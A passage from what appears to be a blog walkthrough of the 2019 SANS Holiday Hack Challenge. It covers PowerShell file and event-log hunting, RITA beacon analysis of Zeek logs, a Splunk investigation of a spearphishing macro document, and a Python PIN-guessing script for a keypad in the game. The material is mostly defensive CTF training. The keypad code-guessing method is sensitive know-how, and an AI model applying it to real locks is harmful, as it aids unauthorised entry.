+ ./runme.elf
+ ~~~~~~~~~~~.
At line:1 char:1
+ ./runme.elf
+ ~~~~~~~~~~~
+ CategoryInfo          : ResourceUnavailable: (:) [], ApplicationFailedException
+ FullyQualifiedErrorId : NativeCommandFailed

We can simply fix this and give execution privileges to the file by using chmod, and then executing the file.

PS /home/elf/archive/refraction> chmod +x ./runme.elf  
PS /home/elf/archive/refraction> ./runme.elf  
refraction?val=1.867

Boom, and there we go! We got the next value for the laser, and it’s the refraction value. Since we have that, let’s read that riddle file inside the archive.

PS /home/elf> type ./archive/refraction/riddle  
Very shallow am I in the depths of your elf home. You can find my entity by using my md5 identity:

25520151A320B5B0D21561F92C8F6224

Alright, so it seems that this file is in a directory called depths, which is in our home directory as we’ve seen previously. We are also provided an md5 sum, so we would need to hash each file and compare it to the provided identity.

The command I used for this portion of the challenge was a little complex, so I highly suggest you Google around for what it does if you’re confused.

Simply what I do is recurse the depths directory to a level of 3, and then I select only necessary objects from the listing; such as the directory name, name of the file, last write time, and file length. Then what we do is create a new calculated property as seen by the @{} statement.

We call the calculated property FileHash and set the value as seen by E= to an MD5 sum hash. We then write all of this data to a file called hash.

PS /home/elf> Get-ChildItem -Path ./depths/ -File -Recurse -Depth 3 | Select DirectoryName,Name,LastWriteTime,Length,@{N='FileHash';E={(Get-FileHash -Algorithm MD5 $_).Hash}} >> hash

Once we have that, we can see if the md5 sum provided to us is in that file. If the md5 sum is in fact in the file, then we can select that pattern and tell it to print 5 line before and after that value, as seen below.

PS /home/elf> type ./hash | Select-String -Pattern "25520151A320B5B0D21561F92C8F6224"
FileHash      : 25520151A320B5B0D21561F92C8F6224
PS /home/elf> type ./hash | Select-String -Pattern "25520151A320B5B0D21561F92C8F6224" -Context 5
  
  DirectoryName : /home/elf/depths/produce
  Name          : thhy5hll.txt
  LastWriteTime : 11/18/19 7:53:25 PM
  Length        : 224
> FileHash      : 25520151A320B5B0D21561F92C8F6224
  
  DirectoryName : /home/elf/depths/produce
  Name          : us04zoj3.txt
  LastWriteTime : 11/18/19 7:53:25 PM
  Length        : 79

Nice, so the file with the same hash is located in /home/elf/depths/produce/thhy5hll.txt. So let’s go ahead and read it.

PS /home/elf> type /home/elf/depths/produce/thhy5hll.txt  
temperature?val=-33.5

I am one of many thousand similar txts contained within the deepest of /home/elf/depths. Finding me will give you the most strength but doing so will require Piping all the FullName's to Sort Length.

And there we have it, the next part of the API, this time we get the temperature value!

After reading the next part of the riddle, we see that our next answer lies in a text file hidden in the depths directory again. It also says that we need to get the full file path and sort by its length.

So, as before, let’s recurse the depths directory, select the full name, and it’s length by creating a new calculated property, and finally let’s sort by that property to get the largest value.

PS /home/elf> Dir ./depths/ -file -recurse | select Fullname,@{Name=”NameLength”;Expression={$_.fullname.length}} | sort NameLength -Descending | fl >> sort.txt

Once we have all that piped out to a file, let’s just select the first 10 items.

PS /home/elf> type ./sort.txt | select -first 10  
  
FullName  : /home/elf/depths/larger/cloud/behavior/beauty/enemy/produce/age/chair/unknown/escape/vote/long/writer/behind/ahead/thin/occasionally/explore/tape/wherever/practical/therefore/cool/plate/ice/play/truth/potatoes/beauty/fourth/careful/dawn/adult/either/burn/end/accurate/rubbed/cake/main/she/threw/eager/trip/to/soon/think/fall/is/greatest/become/accident/labor/sail/dropped/fox/0jhj5xz6.txt  
NameLength : 388

FullName  : /home/elf/depths/larger/cloud/behavior/beauty/enemy/produce/age/chair/unknown/escape/vote/long/writer/behind/ahead/thin/occasionally/explore/tape/wherever/practical/therefore/cool/plate/ice/play/truth/potatoes/beauty/fourth/careful/dawn/adult/either/burn/end/accurate/rubbed/cake/main/she/threw/eager/trip/to/soon/think/fall/is/greatest/become/accident/labor/sail/dropped/u41dl1fz.txt  
NameLength : 384

FullName  : /home/elf/depths/larger/cloud/behavior/beauty/enemy/produce/age/chair/unknown/escape/vote/long/writer/behind/ahead/thin/occasionally/explore/tape/wherever/practical/therefore/cool/plate/ice/play/truth/potatoes/beauty/fourth/careful/dawn/adult/either/burn/end/accurate/rubbed/cake/main/she/threw/eager/trip/to/soon/think/fall/is/greatest/become/accident/labor/sail/dropped/s40exptd.txt  
NameLength : 384

PS /home/elf> type /home/elf/depths/larger/cloud/behavior/beauty/enemy/produce/age/chair/unknown/escape/vote/long/writer/behind/ahead/thin/occasionally/explore/tape/wherever/practical/therefore/cool/plate/ice/play/truth/potatoes/beauty/fourth/careful/dawn/adult/either/burn/end/accurate/rubbed/cake/main/she/threw/eager/trip/to/soon/think/fall/is/greatest/become/accident/labor/sail/dropped/fox/0jhj5xz6.txt  
Get process information to include Username identification. Stop Process to show me you're skilled and in this order they must be killed:

bushy  
alabaster  
minty  
holly

Do this for me and then you /shall/see .

Nice, right away we can see that the first file contains our riddle! For this portion of the riddle it seems that we need to kill a process in a specific order. Once done we should get something in a directory called /shall/see.

So for this, we can simply use Get-Process to see what current running processes we have. We can also pass the -IncludeUserName option so we can see the users who own those processes, since we have to kill them per user in the specific order.

PS /home/elf> Get-Process -IncludeUserName

     WS(M)   CPU(s)      Id UserName                       ProcessName
     -----   ------      -- --------                       -----------
     28.65     2.00       6 root                           CheerLaserServi
    122.60     9.01      31 elf                            elf
      3.52     0.03       1 root                           init
      0.81     0.00      25 bushy                          sleep
      0.73     0.00      26 alabaster                      sleep
      0.80     0.00      27 minty                          sleep
      0.83     0.00      29 holly                          sleep
      3.50     0.00      30 root                           su

Alright, so now we need to kill the process’ in the order specified. We can do this by using the Stop-Process function.

PS /home/elf> Stop-Process -Id 25
PS /home/elf> Stop-Process -Id 26
PS /home/elf> Stop-Process -Id 27
PS /home/elf> Stop-Process -Id 29
PS /home/elf> Get-Process -IncludeUserName

     WS(M)   CPU(s)      Id UserName                       ProcessName
     -----   ------      -- --------                       -----------
     27.04     2.15       6 root                           CheerLaserServi
    129.80     9.46      31 elf                            elf
      3.52     0.03       1 root                           init
      3.50     0.00      30 root                           su

With the processes killed, let’s see if that directory contains anything… or if it even exists.

PS /home/elf> dir /shall/see


    Directory: /shall

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
--r---           1/12/20  1:23 AM            149 see

PS /home/elf> type /shall/see
Get the .xml children of /etc - an event log to be found. Group all .Id's and the last thing will be in the Properties of the lonely unique event Id.

Another riddle? Geez, how much more are there?! Okay, so for this riddle we need to recurse the /etc/ path again and look for an XML file. Once that’s done, we need to group all of the .Id's in the XML file, and whatever stands out, will be our next clue.

Okay, so let’s find that XML file first.

PS /home/elf> Get-ChildItem -Path /etc/ -File -Recurse -Include *.xml 

    Directory: /etc/systemd/system/timers.target.wants

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
--r---          11/18/19  7:53 PM       10006962 EventLog.xml

After running the search, we see that the XML file in question is that of Windows Event Logs, and that might mean that the ID’s are actually windows event ID’s!

Right, so by using some complex powershell commands, let’s parse this XML file, and see what kind of objects are contained within in.

PS /home/elf> [xml]$xml = Get-Content -Path /etc/systemd/system/timers.target.wants/EventLog.xml
PS /home/elf> $xml

Objs
----
Objs

PS /home/elf> $xml.Objs

Version xmlns                                           Obj
------- -----                                           ---
1.1.0.1 http://schemas.microsoft.com/powershell/2004/04 {Obj, Obj, Obj, Obj…}

PS /home/elf> type /etc/systemd/system/timers.target.wants/EventLog.xml | select -first 20
<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
  <Obj RefId="0">
    <TN RefId="0">
      <T>System.Diagnostics.Eventing.Reader.EventLogRecord</T>
      <T>System.Diagnostics.Eventing.Reader.EventRecord</T>
      <T>System.Object</T>
    </TN>
    <ToString>System.Diagnostics.Eventing.Reader.EventLogRecord</ToString>
    <Props>
      <I32 N="Id">3</I32>
      <By N="Version">5</By>
      <Nil N="Qualifiers" />
      <By N="Level">4</By>
      <I32 N="Task">3</I32>
      <I16 N="Opcode">0</I16>
      <I64 N="Keywords">-9223372036854775808</I64>
      <I64 N="RecordId">2194</I64>
      <S N="ProviderName">Microsoft-Windows-Sysmon</S>
      <G N="ProviderId">5770385f-c22a-43e0-bf4c-06f5698ffbd9</G>
      <S N="LogName">Microsoft-Windows-Sysmon/Operational</S>

Seemingly I was right, these are event ID’s associated with Sysmon. Okay, so we need to find that β€œlonely” event ID. So let’s iterate through each Id and group these Id object by using the Group-Object function.

PS /home/elf> type /etc/systemd/system/timers.target.wants/EventLog.xml | Select-String -Pattern 'N="Id"' | Group-Object

Count Name                      Group
----- ----                      -----
    1       <I32 N="Id">1</I32> {      <I32 N="Id">1</I32>}
   39       <I32 N="Id">2</I32> {      <I32 N="Id">2</I32>,       <I32 N="Id">2</I32>,       <I3…
  179       <I32 N="Id">3</I32> {      <I32 N="Id">3</I32>,       <I32 N="Id">3</I32>,       <I3…
    2       <I32 N="Id">4</I32> {      <I32 N="Id">4</I32>,       <I32 N="Id">4</I32>}
  905       <I32 N="Id">5</I32> {      <I32 N="Id">5</I32>,       <I32 N="Id">5</I32>,       <I3…
   98       <I32 N="Id">6</I32> {      <I32 N="Id">6</I32>,       <I32 N="Id">6</I32>,       <I3…

Right away I can see that the lonely event Id is that of β€œ1”. So, let’s grab that event ID and print the first 150 lines directly after it.

PS /home/elf> type /etc/systemd/system/timers.target.wants/EventLog.xml | Select-String -Pattern 'N="Id">1<' -Context 0, 150

>       <I32 N="Id">1</I32>
        <By N="Version">5</By>
        <Nil N="Qualifiers" />
        <By N="Level">4</By>
        <I32 N="Task">1</I32>
        <I16 N="Opcode">0</I16>
        <I64 N="Keywords">-9223372036854775808</I64>
        <I64 N="RecordId">2422</I64>
        <S N="ProviderName">Microsoft-Windows-Sysmon</S>
        <G N="ProviderId">5770385f-c22a-43e0-bf4c-06f5698ffbd9</G>
        <S N="LogName">Microsoft-Windows-Sysmon/Operational</S>
        <I32 N="ProcessId">1960</I32>
        <I32 N="ThreadId">6640</I32>
        <S N="MachineName">elfuresearch</S>
        ---snip---
              <TNRef RefId="1806" />
              <ToString>System.Diagnostics.Eventing.Reader.EventProperty</ToString>
              <Props>
                <S N="Value">PowerShell.EXE</S>
              </Props>
            </Obj>
            <Obj RefId="18016">
              <TNRef RefId="1806" />
              <ToString>System.Diagnostics.Eventing.Reader.EventProperty</ToString>
              <Props>
                <S N="Value">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -c 
"`$correct_gases_postbody = @{`n    O=6`n    H=7`n    He=3`n    N=4`n    Ne=22`n    Ar=11`n    
Xe=10`n    F=20`n    Kr=8`n    Rn=9`n}`n"</S>
              </Props>
            </Obj>
            <Obj RefId="18017">
              <TNRef RefId="1806" />
              <ToString>System.Diagnostics.Eventing.Reader.EventProperty</ToString>
              <Props>
                <S N="Value">C:\</S>
              </Props>
            </Obj>
            <Obj RefId="18018">
              <TNRef RefId="1806" />

If we dig through this event log, we should see toward the end the correct gasses used for the laser! If we clean it up we get something like this: O=6&H=7&He=3&N=4&Ne=22&Ar=11&Xe=10&F=20&Kr=8&Rn=9.

Nice! Now that we finally have all the settings we need, let’s go ahead and update the laser using the API.

PS /home/elf> (Invoke-WebRequest [http://127.0.0.1:1225/api/off).RawContent](http://127.0.0.1:1225/api/off).RawContent)  
HTTP/1.0 200 OK  
Server: Werkzeug/0.16.0  
Server: Python/3.6.9  
Date: Mon, 16 Dec 2019 02:34:20 GMT  
Content-Type: text/html; charset=utf-8  
Content-Length: 33

Christmas Cheer Laser Powered Off  
PS /home/elf> (Invoke-WebRequest [http://127.0.0.1:1225/api/angle?val=65.5).RawContent](http://127.0.0.1:1225/api/angle?val=65.5).RawContent)  
HTTP/1.0 200 OK  
Server: Werkzeug/0.16.0  
Date: Mon, 16 Dec 2019 02:34:29 GMT  
Content-Type: text/html; charset=utf-8  
Content-Length: 77

Updated Mirror Angle - Check /api/output if 5 Mega-Jollies per liter reached.  
PS /home/elf> (Invoke-WebRequest [http://127.0.0.1:1225/api/refraction?val=1.867).RawContent](http://127.0.0.1:1225/api/refraction?val=1.867).RawContent)  
HTTP/1.0 200 OK  
Server: Werkzeug/0.16.0  
Server: Python/3.6.9  
Date: Mon, 16 Dec 2019 02:34:35 GMT  
Content-Type: text/html; charset=utf-8  
Content-Length: 87

Updated Lense Refraction Level - Check /api/output if 5 Mega-Jollies per liter reached.  
PS /home/elf> (Invoke-WebRequest [http://127.0.0.1:1225/api/temperature?val=-33.5).RawContent](http://127.0.0.1:1225/api/temperature?val=-33.5).RawContent)  
HTTP/1.0 200 OK  
Server: Werkzeug/0.16.0  
Server: Python/3.6.9  
Date: Mon, 16 Dec 2019 02:34:41 GMT  
Content-Type: text/html; charset=utf-8  
Content-Length: 82

Updated Laser Temperature - Check /api/output if 5 Mega-Jollies per liter reached.

PS /home/elf> $postParam = "O=6&H=7&He=3&N=4&Ne=22&Ar=11&Xe=10&F=20&Kr=8&Rn=9"

PS /home/elf> (Invoke-WebRequest [http://127.0.0.1:1225/api/gas](http://127.0.0.1:1225/api/gas) -Method POST -Body $postParam).RawContent  
HTTP/1.0 200 OK  
Server: Werkzeug/0.16.0  
Server: Python/3.6.9  
Date: Mon, 16 Dec 2019 02:34:43 GMT  
Content-Type: text/html; charset=utf-8  
Content-Length: 81

Updated Gas Measurements - Check /api/output if 5 Mega-Jollies per liter reached.  
PS /home/elf> (Invoke-WebRequest [http://127.0.0.1:1225/api/on).RawContent](http://127.0.0.1:1225/api/on).RawContent)  
HTTP/1.0 200 OK  
Server: Werkzeug/0.16.0  
Server: Python/3.6.9  
Date: Mon, 16 Dec 2019 02:34:49 GMT  
Content-Type: text/html; charset=utf-8  
Content-Length: 32

Christmas Cheer Laser Powered On  
PS /home/elf> (Invoke-WebRequest [http://127.0.0.1:1225/api/ooutput).RawContent](http://127.0.0.1:1225/api/ooutput).RawContent)  
HTTP/1.0 200 OK  
Server: Werkzeug/0.16.0  
Server: Python/3.6.9  
Date: Mon, 16 Dec 2019 02:34:52 GMT  
Content-Type: text/html; charset=utf-8  
Content-Length: 200

Success! - 6.73 Mega-Jollies of Laser Output Reached!

Success! Well that was a pain, but at least we got it!

Network Log Analysis: Determine Compromised System

Upon successfully completing the Xmas Laser Cheer CranPI, we can talk to Sparkle again for more hints that will allow us to complete the next objective.

For this objective, it seems that we need to help identify the IP address of the malware-infected system using the following Zeek logs. Now if we look at the hints provided to us, we see Sparkle gave us a link to RITA’s homepage.

After looking into what RITA is, we learn that it is an open source framework for network traffic analysis which allows for the ingestion of Bro/Zeek Logs in TSV format.

Right, so with that information in mind, let’s go ahead and download the Zeek logs provided to us, and unzip them.

root@kali:~/HH/elf-zeeklogs# ls -la
total 309848
drwxr-xr-x 3 root root      4096 Dec 22 15:24 .
drwxr-xr-x 5 root root      4096 Dec 22 15:24 ..
drwxrwxrwx 3 root root     57344 Aug 24 09:43 elfu-zeeklogs
-rw-r--r-- 1 root root 317217612 Nov 20 15:07 elfu-zeeklogs.zip

Once unzipped, we see that we have a new directory containing all the logs needed for RITA. So let’s go ahead and install RITA. If you’re on Kali like me, you’ll have to install it manually.

To start, we first need to install MongoDB - specifically version 3.16.6 or otherwise RITA won’t work.

Next, we need to install Go and install RITA from the GitHub repository.

root@kali:~/HH/elf-zeeklogs# sudo apt-get install go-dep
root@kali:~/HH/elf-zeeklogs# wget https://dl.google.com/go/go1.13.5.linux-amd64.tar.gz
root@kali:~/HH/elf-zeeklogs# tar -C /usr/local -xzf go1.13.5.linux-amd64.tar.gz 
root@kali:~/HH/elf-zeeklogs# export PATH=$PATH:/usr/local/go/bin
root@kali:~/HH/elf-zeeklogs# go version
go version go1.13.5 linux/amd64
root@kali:~/HH/elf-zeeklogs# go get github.com/activecm/rita
root@kali:~/HH/elf-zeeklogs# cd /root/go/src/github.com/activecm/rita
root@kali:~/go/src/github.com/activecm/rita# make install
root@kali:~/go/src/github.com/activecm/rita# mkdir /etc/rita && sudo chmod 755 /etc/rita
root@kali:~/go/src/github.com/activecm/rita# mkdir -p /var/lib/rita/logs && sudo chmod -R 755 /var/lib/rita
root@kali:~/go/src/github.com/activecm/rita# cp /root/go/src/github.com/activecm/rita/etc/rita.yaml /etc/rita/config.yaml && sudo chmod 666 /etc/rita/config.yaml

Once that’s done, we need to start mongodb, and we can launch RITA.

root@kali:~/HH/elf-zeeklogs# service mongod start
root@kali:~/HH/elf-zeeklogs# rita 
NAME:
   rita - Look for evil needles in big haystacks.

USAGE:
   rita [global options] command [command options] [arguments...]

VERSION:
   v3.1.1

COMMANDS:
     delete, delete-database  Delete imported database(s)
     import                   Import bro logs into a target database
     html-report              Create an html report for an analyzed database
     show-beacons             Print hosts which show signs of C2 software
     show-bl-hostnames        Print blacklisted hostnames which received connections
     show-bl-source-ips       Print blacklisted IPs which initiated connections
     show-bl-dest-ips         Print blacklisted IPs which received connections
     list, show-databases     Print the databases currently stored
     show-exploded-dns        Print dns analysis. Exposes covert dns channels
     show-long-connections    Print long connections and relevant information
     show-strobes             Print strobe information
     show-useragents          Print user agent information
     test-config              Check the configuration file for validity
     help, h                  Shows a list of commands or help for one command

GLOBAL OPTIONS:
   --help, -h     show help
   --version, -v  print the version

Perfect, we got RITA working! Now just a side note, if you read the GitHub repository carefully you should see the following important note.

After reading that, go ahead and uncomment the InternalSubnets section in the config file, otherwise you might not see all the data you want. After you do that, we can then import all our logs into a new database called holiday_hack.

root@kali:~/HH/elf-zeeklogs# rita import elfu-zeeklogs/ holiday_hack

	[+] Importing [elfu-zeeklogs/]:
	[-] Verifying log files have not been previously parsed into the target dataset ... 
	[-] Parsing logs to: holiday_hack ... 
	[-] Parsing elfu-zeeklogs/conn.log-00001_20190823120021.log -> holiday_hack
	[-] Parsing elfu-zeeklogs/conn.log-00002_20190823121227.log -> holiday_hack
	[-] Parsing elfu-zeeklogs/conn.log-00003_20190823122444.log -> holiday_hack
	[-] Parsing elfu-zeeklogs/conn.log-00004_20190823123904.log -> holiday_hack
	[-] Parsing elfu-zeeklogs/conn.log-00005_20190823125418.log -> holiday_hack
	[-] Parsing elfu-zeeklogs/conn.log-00006_20190823130731.log -> holiday_hack
	[-] Parsing elfu-zeeklogs/conn.log-00007_20190823132006.log -> holiday_hack
	---snip---
           [-] Host Analysis:            41993 / 41993  [==================] 100 %
           [-] Uconn Analysis:           115915 / 115915  [==================] 100 %
           [-] Exploded DNS Analysis:    47836 / 47836  [==================] 100 %
           [-] Hostname Analysis:        47836 / 47836  [==================] 100 %
           [-] Beacon Analysis:          115915 / 115915  [==================] 100 %
           [-] UserAgent Analysis:       6 / 6  [==================] 100 %
	[!] No certificate data to analyze
	[-] Updating blacklisted peers ...
	[-] Indexing log entries ... 
	[-] Updating metadatabase ... 
[-] Done!

Awesome, the logs were imported successfully! Now we can start digging into the logs to find the β€œIP address of the malware-infected system”. By malware I’m assuming there must be some sort of C2 (Command and Control) server it’s communicating to.

Thankfully, RITA has a show-beacons command that print hosts which show signs of C2 software. So let’s use that and see what we find!

root@kali:~/HH/elf-zeeklogs# rita show-beacons holiday_hack -H | less -S

+-------+-----------------+-----------------+-------------+-------------+-------------+------------+-----------+----------+-----------------+----------------+-------------
| SCORE |    SOURCE IP    | DESTINATION IP  | CONNECTIONS | AVG  BYTES  | INTVL RANGE | SIZE RANGE | TOP INTVL | TOP SIZE | TOP INTVL COUNT | TOP SIZE COUNT |  INTVL SKEW 
+-------+-----------------+-----------------+-------------+-------------+-------------+------------+-----------+----------+-----------------+----------------+-------------
| 0.998 | 192.168.134.130 | 144.202.46.214  |        7660 |        1156 |          10 |        683 |        10 |      563 |            6926 |           7641 |            0
| 0.847 | 192.168.134.131 | 150.254.186.145 |         684 |       13737 |        8741 |       2244 |         1 |      698 |              54 |            356 |            0
| 0.847 | 192.168.134.132 | 150.254.186.145 |         684 |       13634 |       37042 |       2563 |         1 |      697 |              58 |            373 |            0

We can see that 192.168.134.130 connects to 144.202.46.214 with over 7660 connection, and overall this also has the highest score.

Knowing that, we can navigate to the fifth objective in our badge and enter the IP of β€œ144.202.46.214” to complete the objective.

Now that we have completed our 5 objectives, we can return to Santa and talk to him again.

After talking with Santa, we learn that he wants us to gain access to the steam tunnels, and complete the 6th and 7th objectives as well… so let’s do just that!

Objective 6

Splunk

Once we talk to Santa, we look at Objective 6 and learn that we need to access https://splunk.elfu.org/ and figure out what was the message for Kent that the adversary embedded in their attack.

We also learn that if we need hints on achieving this objective, we should go visit the Laboratory in Hermey Hall and talk with Prof. Banas.

So right away, let’s go to the Laboratory and talk with the Professor.

Alright, so it seems the professor’s computer has been hacking other computers on campus, and we need to figure out why! The professor also provides us a username and password to access the splunk instance.

Upon logging into the splunk instance, we are greeted with the following information.

Okay, so our initial goal here is to answer the β€œChallenge Question” which we should see on the right-hand side of the splunk screen. We also have training questions that we can answer as they will help us get closer to answering the final question.

With this in mind, and since this is a learning experience, we will go through all the training questions and then answer the final challenge question.

Upon closing that message, we should the following screen. To the left we have our chat, and to the right we have our question.

We see that our first training question is β€œWhat is the short host name of Professor Banas’ computer?”. If we look into the chat with Alice, she gives us a little hint as to where we can find that answer.

At the same time, she also gives us two links for the Splunk Search and access to the Raw File Archive as we will need them for the final answer.

With that in our pocket, let’s go check out the #ELFU SOC chat to see if we can’t learn more and answer our first question.

After reading the chat, we see that a system called β€œsweetums” is communicating with a weird IP. We also learn that the system is Professor Banas’ system - which is the answer to our first question!

After answering the question, we get access to our second question - β€œWhat is the name of the sensitive file that was likely accessed and copied by the attacker?”

If we look back into the chat with Alice, we should see here providing us a search query that searches for events that contain the professors name.

The splunk search query looks something like so: index=main cbanas.

We also learn that the adversaries are trying to get to Santa by constantly trying to attack him and that they may have found some of Santa’s sensitive data. So, using the search query provided to us, let’s change the username from cbanas to santa to look for any events associated with Santa’s account.

After running the query, right away we can see a powershell operation that interacted with a file called C:\Users\cbanas\Documents\Naughty_and_Nice_2019_draft.txt - which is the answers to our second question!

After answering the 2nd question, we get access to the 3rd one - β€œWhat is the fully-qualified domain name(FQDN) of the command and control(C2) server?”

Looking back into the chat with Alice we see some more hints and tips from her on how to find the answer for the question.

Alice tells us that we need to use Microsoft Sysmon data to answer this question, and provides us some background on Sysmon if we need it.

Alice also explains that in Sysmon, Event Code 3 represents that a network connection occurred. Along with that, she also provides us a splunk query that will look through sysmon logs for any powershell activity with the event code of 3.

With this information, we can enter the query in spunk, and then look at the β€œdest” field in the β€œInteresting Fields” section to see if we can’t spot the malicious IP.

Upon investigation all the destination IP’s provided by the query, we see that a network connection was made to 144.202.46.214.vultr.com over 158 times - and this would be the answers to our 3rd question!

After answering the 3rd question, we now get access to our 4th training question - β€œWhat document is involved with launching the malicious PowerShell code?”

Once again, let’s go back and chat with Alice to see what she has to say about this.

If we scroll up a little in the chat, Alice explains to us that we can use the reverse pipe option in splunk to sort all the events, with the oldest one being first. To sort on the oldest powershell operational logs, the query would look like so:

index=main sourcetype="WinEventLog:Microsoft-Windows-Powershell/Operational" | reverse

Alice then tells us that we can use the Time column to specify a time window. For this case we will be accepting the default +/- five second window from the oldest event. So let’s go ahead and do that.

Once we have that filter in place, we now need to find out what document launched the powershell code. Alice also gives us another hint by explaining that in Sysmon, Event ID 1 is logged when a new process is created.

In the case we don’t have that, then we can look for Windows Event ID 4688 which documents each program that is executed, who the program ran as and the parent process that started the child process.

So with that information, let’s create a simple query that will look for Event ID 4688 in the Windows Event Logs.

Upon executing the query, we see that we have a total of 156 events within our time window that we filtered for previously. Looking at the events, we can see a process creation of WINWORD.exe, which is Microsoft Word

Looking into the β€œProcess Command Line” we see that Word opened a new document from a zip folder, called 19th Century Holiday Cheer Assignment.docm by using the /n switch - which would be our answer for the 4th question!

After answering the 4th question, we now get access to our 5th training question - β€œHow many unique email addresses were used to send Holiday Cheer essays to Professor Banas?”

As before, we go back to Alice so we can chat with her and see what she’s got for us.

Upon talking with Alice again, we learn a little bit about stoQ. We learn that stoQ is an automation framework that can be used to analyze all email messages. Alice also provides us a link to the stoQ project home page, and provides a link to slides from a talk on stoQ from the SANS DFIR Summit a few years back.

Alice then goes on to state that stoQ output is in JSON format, and is stored in their splunk logs. She also provides us the following splunk query that we can use to search through the stoQ data.

index=main sourcetype=stoq | table _time results{}.workers.smtp.to results{}.workers.smtp.from  results{}.workers.smtp.subject results{}.workers.smtp.body | sort - _time

Furthermore, we are told to check out strange-looking field names like results{}.workers.smtp.subject which should help us look for email subject names.

Alice also gives us a hint on where to look for by stating that all Professor Banas’ homework submissions were sent to him via email with the subject β€œHoliday Cheer Assignment Submission”.

With this information at our hands, let’s build a stoQ splunk query that will filter out all emails, except those with the subject title from above. Overall, our query should look like so.

Once the query is executed, we can see that a total of 21 unique emails were used to send in the homework - which would be the answer to our 5th question!

After answering the 5th question, we now get access to our 6th training question - β€œWhat was the password for the zip archive that contained the suspicious file?”

You know the drill everyone, back to Alice we go!

One thing really stands out with during this conversation with Alice, as she mentions that the attacker used the MITRE ATT&CK Technique - 1193 which is specifically allocated to Spearphishing Attachment.

In the case of this Spearphishing attack, the target was Professor Banas, and it was successful unfortunately.

So using our previous stoQ splunk query, if we look at the first email we notice something very suspicious from Bradly Buttercups.

Having someone enable editing and enabling content is a sure indicator that malware was included in the document! We can also see that the password for this zip file that protected the malicious document from any email filters was 123456789 - which is the answers to our question!

After answering the 6th question, we now get access to our 7th and final training question -β€œWhat email address did the suspicious file come from?”

Well this answer is easy, let’s just look back at our splunk query where we found the password, and we should see the email in the results{}.workers.smtp.from field.

The answer - [email protected].

Now that we answered all the training question and better learned splunk, let’s go talk to Alice again to see what hints she has for the challenge question.

Alice first starts by telling us that the message we need to find seems to be embedded in the properties of the malicious document. She also provides a stoQ splunk query that allows us to search for all raw artifacts and their entities in a file by using the following query:

index=main sourcetype=stoq  "results{}.workers.smtp.from"="bradly buttercups <[email protected]>"

The only problem with this is that there are a ton of results within the JSON events. Thankfully Alice gives us some more splunk commands that will help us evaluate all the results, and provide us with a file name, and full path name which we can then use in our file archive to dig for the property data.

The splunk query when combined will look like so, and provide us the following output.

Alright, now that we have all these files and location in the archive… where do we look? Well I’m glad you asked! If you actually took a few minutes to do some Googling, you would have come across a blog post from Microsoft on Managing Metadata with Document Information Panels.

If we dig through that post, we should see the following:

Standard document properties can be maintained through the Document Properties view of the Document Information Panel. To see where these properties are actually stored in the OpenXML package, open the .rels file in the _rels folder of the unzipped Office document. As you can see in Figure 4, this file shows that standard document properties (core properties) are stored in the core.xml file within the docProps folder. The core.xml file contains all of the standard document properties that are populated from the Document Properties view in the Document Information Panel.

So, it seems that the core.xml file is what we need to look into for properties and metadata! So let’s download that file from the archive, rename it to β€œcore.xml and open it up to read it’s contents.

Right away we can see within the description section of XML file, we see the comment!

Once we know that, we can navigate to the 6th objective in our badge and enter the message to complete the objective!

Objective 7

Frosty Keypad

With the completion of our 6th objective, we now need to gain access to the steam tunnels just as Santa told us. If we look into Objective 7 it tells us that for hints, we should visit Minty’s dorm room and talk with Minty Candycane.

On the map the Dormitory is on the right side. From Professor Banas we exit into the Quad, go right, and we should meet Tangle Coalbox, standing next to some sort of keypad.

Upon talking with Tangle, we learn that the keypad lock has been popped by someone and that we need to open it up for Tangle. He also provides us some hints on how to complete this challenge.

Upon accessing the keypad we are presented with the following:

Right away we notice something very interesting. The numbers 1, 3, and 7, along with the enter button seem to be more worn out then the other keys. For those that have never done any physical security engagements, or have never played around with lock cracking, anytime numbers on a keypad are worn out simply means that those numbers are part of the security code needed to the enter the door. This directly relates to hint #3 provided to us by Tangle.

Tangle also provides us the following two other hints:

  1. One digit is repeated once.
  2. The code is a prime number.

For those that don’t know what a prime number is, it’s simply a number that is only divisible by 1 and itself. For example. 13 is a prime number because no other number can be evenly divided into 13.

So with this information, I’m assuming that the code is going to be 4 digits long, with one of the numbers being used twice, and the number being a prime (again only divisible by 1 or itself). Since there can be a lot of combinations, let’s write a quick python script that will generate a 4-digit prime number using 1, 3, and 7, and then will send the code to the keypad.

Let’s start by making a simple prime number generator:

#!/usr/bin/python3
import math

count = 3
while True:
    isPrime = True
    for x in range(2, int(math.sqrt(count) + 1)):
        if count % x == 0: 
            isPrime = False
            break
    if isPrime:
        print(count)
    count += 1

From the top let’s explain what this script does.

Since 1 is not a prime number, we start our loop at 3 and set the isPrime variable to True. We then check if the count is a modulus of x in our range. If there is no remainder, then it’s not a prime number, so we set isPrime variable to false and break the loop. Otherwise if that modulus is false, we print the number since it is a prime.

If we run the script for a few seconds, we should see some valid prime numbers:

root@kali:~/HH/frosty_keypad# python3 code_breaker.py 
3
5
7
11
13
17
19
23

Awesome, so we got the prime number generator to work. The only issue is that we start from 3 and work our way up, while the pin code is a 4 digit prime number using 1, 3, and 7. So what we have to do is write some code that will only generate numbers using those three digits and only reuses a digit once.

So valid pins can be 1137, 1337, or 1377. Pins like 1113 and 1333 are not valid as they reuse one number more than once.

To do that, we will use something called combinatorics which is an area of mathematics primarily concerned with counting, both as a means and an end in obtaining results, and certain properties of finite structures.

The python script used to generate our 4-digit pin number using only our three valid digits will look like so.

from itertools import product

valid_digits = [1,3,7]

def generate(valid_numbers):
    from itertools import product
    possible_digits = len(valid_numbers)
    for raw in product(valid_numbers, repeat=4):
        if len(set(raw)) == possible_digits:
            yield raw


for nums in generate(valid_digits):
    print(''.join(map(str, nums)))

Let’s quickly go over what this script does.

First, we start by defining a list called valid_digits which contains the numbers we want to use in generating our pin. We then create a new function definition called generate and we pass into it our valid_numbers list.

Next, we import product from itertools. This tool will be used to compute the cartesian product of input iterables. A cartesian product, in simple terms, takes two sets and returns another set of tuples or β€œpairs.”

The cartesian product is just taking every possible combination of the elements of A and B and expressing them as a set of tuples (paired values). This is great for us because it will automatically reuse one of the other digits, allowing us to use that hint from Tangle.

From there, we get the number of possible digits (3), and set it to the possible_digits variable. Finally, we use product, to generate all possible 4-digit pin numbers using the product function and then yield the raw value back to us.

